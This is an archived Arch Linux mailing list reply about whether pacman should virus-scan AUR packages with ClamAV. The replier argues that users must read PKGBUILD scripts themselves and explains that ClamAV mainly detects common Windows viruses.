[arch-general] Integrating Virus Scanning for Packages Handled by Pacman

Daniel Micay danielmicay at gmail.com
Tue Apr 23 18:56:56 EDT 2013


On Tue, Apr 23, 2013 at 1:10 PM, Mark E. Lee <mark at markelee.com> wrote:
> While building packages on the AUR, I was wondering that except for
> manual user intervention (by reading the code), I didn't have any other
> methods of knowing if a package had malware or viruses. Hence, I was
> wondering if virus scanning via clamav should be called before pacman
> installs packages.
>
> --
> Mark E. Lee <mark at markelee.com>

The PKGBUILD itself is a bash script. If you're running them without
reading the code and checking that the sources are from an upstream
you trust, you're gonna have a bad time.

There are plenty of packages in the AUR that touch outside of $pkgdir
- but most seem to be beginner mistakes in good faith. ClamAV pretty
much just detects very common win32 viruses, because it's used on mail
servers to *reduce* the number of spread viruses.

If you really feel like scanning the package contents after you've
already trusted the PKGBUILD and build scripts, just don't use makepkg
-i.


More information about the arch-general mailing list